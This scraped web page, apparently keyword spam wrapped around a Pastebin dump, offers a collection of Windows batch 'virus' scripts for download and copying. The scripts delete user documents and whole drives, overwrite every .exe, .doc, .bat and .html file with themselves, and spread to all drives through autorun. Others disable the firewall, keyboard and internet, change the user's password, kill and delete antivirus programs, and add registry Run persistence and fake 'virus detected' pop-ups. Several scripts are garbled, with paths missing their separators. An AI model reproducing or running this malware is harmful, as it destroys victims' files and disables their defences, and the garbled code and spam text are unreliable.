Batch Virus Download



Some of these codes are very dangerous!
USE THIS AT YOUR OWN RISK.

Batch Virus Generator Download Batch file splitter software break all file formats like rar, zip, txt, avi, mp3, doc, exe, tiff, jpg, etc into smaller parts and joiner combiner merger option will join combine merge these chunks to get original file.Document breaker utility. Batch Virus Maker, free batch virus maker software downloads. Simple Batch Virus Codes. Raw download clone embed. Normally used to say stuff like 'virus detected' and 'fix virus' wich leads user to install a virus. We will also see how batch files can be dangerous if misused and try to build a small virus program. In this tutorial we will see how to create a virus using batch file programming. Don’t worry, I’ll take enough precautions to have your computer in a safe state besides, illustrate how frustrating some batch files can be, if misused. Real Viruses(simple Ones) the first one: copy the code.



Block Google.
@echo off
::--------Block Google-------::
cd 'C:WindowsSystem32Driversetc'
echo 127.0.0.1 google.com >> 'Hosts'
echo 127.0.0.1 www.google.com >> 'Hosts'
::---------------------------::

Block Hotmail.
@echo off
::--------Block Hotmail------::
cd 'C:WindowsSystem32Driversetc'
echo 127.0.0.1 hotmail.com >> 'Hosts'
echo 127.0.0.1 www.hotmail.com >> 'Hosts'
::---------------------------::

Block MSN.Batch Virus Download
@echo off
::---------Block MSN---------::
cd 'C:WindowsSystem32Driversetc'
echo 127.0.0.1 msn.com >> 'Hosts'
echo 127.0.0.1 www.msn.com >> 'Hosts'
::---------------------------::
Batch Virus Download
Block wikipedia.
@echo off
::-------Block Wikipedia-----::
cd 'C:WindowsSystem32Driversetc'
echo 127.0.0.1 wikipedia.org >> 'Hosts'
echo 127.0.0.1 www.wikipedia.org >> 'Hosts'
::---------------------------::

Change time to 00:00.
::__---Virus Created By Virus Author---__::
@echo off
::------Change The Time------::
time 00:00
::---------------------------::

Batch File Virus Download


Change user pass.
@echo off
::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::

Create account OWNED.
@echo off
::----Hide My Music Folder---::
attrib +h '%userprofile%my documentsmy music'
::---------------------------::

Delete al docs.
@echo off
::----Delete My Documents----::
del /f /q 'C:Users%userprofile%My Documents*.*'
::---------------------------::

Delete all music.
@echo off
::-----Delete My Music-------::
del /f /q 'C:Users%userprofile%My DocumentsMy Music*.*'
::---------------------------::

Delete all pics.
@echo off
::-----Delete My Pictures----::
del /f /q 'C:Users%userprofile%My DocumentsMy Pictures*.*'
::---------------------------::

Disable Firewall.

@echo off
::-Disable Windows Firewall--::
net stop 'MpsSvc'
taskkill /f /t /im 'FirewallControlPanel.exe'
::---------------------------::
Download
[color=#FF0000]Disable Internet.

@echo off
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::

Disable Keyboard.
@echo off
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > 'nokeyboard.reg'
echo [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlKeyboard Layout] >> 'nokeyboard.reg'
echo 'Scancode Map'=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00, >> 'nokeyboard.reg'
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00, >> 'nokeyboard.reg'
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37, >> 'nokeyboard.reg'
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00, >> 'nokeyboard.reg'
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00, >> 'nokeyboard.reg'
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00, >> 'nokeyboard.reg'
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49, >> 'nokeyboard.reg'
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00, >> 'nokeyboard.reg'
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00, >> 'nokeyboard.reg'
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00, >> 'nokeyboard.reg'
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16, >> 'nokeyboard.reg'
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00, >> 'nokeyboard.reg'
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00, >> 'nokeyboard.reg'
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00, >> 'nokeyboard.reg'
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30, >> 'nokeyboard.reg'
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00, >> 'nokeyboard.reg'
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00, >> 'nokeyboard.reg'
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00, >> 'nokeyboard.reg'
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a, >> 'nokeyboard.reg'
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0, >> 'nokeyboard.reg'
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> 'nokeyboard.reg'
start nokeyboard.reg
::---------------------------::

Infect all Bat.
@echo off
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
)
Del /f /s /q DirPath
::---------------------------::

Infect all docs.
@echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
)
Del /f /s /q DirPath
::---------------------------::

Infect all Drivers.
@echo off
::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:
echo [AutoRun] > %%E:autorun.inf
echo open='%%E:%0' >> %%E:autorun.inf
echo action=Open folder to see files... >> %%E:autorun.inf)
::---------------------------::

Infect all .exe files.
@echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
::---------------------------::

Open disk.
@echo off
::-------Open Disk Tray------::
echo Do >> 'opendisk.vbs'
echo Set oWMP = CreateObject('WMPlayer.OCX.7' ) >> 'opendisk.vbs'
echo Set colCDROMs = oWMP.cdromCollection >> 'opendisk.vbs'
echo colCDROMs.Item(d).Eject >> 'opendisk.vbs'
echo colCDROMs.Item(d).Eject >> 'opendisk.vbs'
echo Loop >> 'opendisk.vbs'
start ' 'opendisk.vbs'
::---------------------------::

Spam /C Drive.
@echo off
::-------Spam C Drive--------::
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
::---------------------------::
Batch Virus Download
Kill Anti-virus.
@echo off
::-------AV Kill [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.dat
cls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda software*.*
::---------------------------::

Infect all HTML.

@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
)
Del /f /s /q DirPath
::---------------------------::

Hide MUSIC folder.
Download

Batch Virus Download Software

@echo off
::----Hide My Music Folder---::
attrib +h '%userprofile%my documentsmy music'
::---------------------------::

Startup XP song
@echo off
::--Start Hidden WinXP Song--::
cd 'C:Windowssystem32oobeimages'
start title.wma
::---------------------------::

Batch Virus Maker V2 Free Download


Infect CMD.

Batch Virus Generator Download


@echo off
::-----Infect 'ls' CMD-----::
copy %0 %windir%system32ls.bat
::---------------------------::
May 18th, 2015
Never
Not a member of Pastebin yet?Sign Up, it unlocks many cool features!

Bat Virus Maker

  1. Virus codes | @echo off (cmd wont show command) @echo on (cmd will show command)
  2. #1 simple virus (opening-cpu drain)
  3. @echo off
  4. start
  5. goto :A
  6. #2 simple shutdown command - not really a virus
  7. shutdown -s -t 00<(time) -c 'message here' (you dont need a message)
  8. #3 make a bunch of folders to the desktop - not really a virus
  9. @echo off
  10. cd 'c: documents and settings%username% <<(or) documents and settingsall usersdesktop'
  11. md %random%
  12. :A
  13. (if you want to add more sites add the start (URL here) command here and below)
  14. goto :A
  15. #5 system 32 deleter (HARMFUL)
  16. @echo off del c:windowssystem 32 (extesion.bat)
  17. (DO NOT CREATE ON YOUR MAIN MACHINE)
  18. #6 delete every file off computer
  19. del D:. /f /s /q
  20. del F:. /f /s /q
  21. del H:. /f /s /q
  22. del J:. /f /s /q
  23. Start Crash
  24. (you can copy and paste Start Crash over and over again for more power)
  25. X=Msgbox('Virus Is Active',0+16,'Virus Alert')
  26. X=Msgbox('Wanna Fix Virus',0+16,'Fix Virus')
  27. del D:. /f /s /q
  28. del F:. /f /s /q
  29. del H:. /f /s /q
  30. del J:. /f /s /q
  31. :A
  32. ping localhost -m 5 >nul
  33. This has a lot of nasty stuff in it. This can KILL a machine once ran. ( DO NOT TRY ON MAIN MACHINE )
  34. #9 Message Box - Normally used to say stuff like 'virus detected' and 'fix virus' wich leads user to install a virus or message displays while virus is running.
  35. X=Msgbox('Virus Found On Your Computer',0+16,'Virus Detected')
  36. You can copy and paste this to have more messages pop up. (you have to run in VBs)
  37. #10 Trojan Horse virus - very simple Trojan Horse virus that WORKS. (.bat)
  38. @echo off
  39. Start C:Programsvirus.bat
  40. echo break off>>c:windowswimn32.bat
  41. echo end>>c:windowswimn32.bat
  42. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  43. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  44. PAUSE
  45. :top
  46. GOTO top
  47. Set wshShell =wscript.CreateObject(”WScript.Shell”)
  48. wscript.sleep 100
  49. loop
  50. deltree C:

Batch Virus Download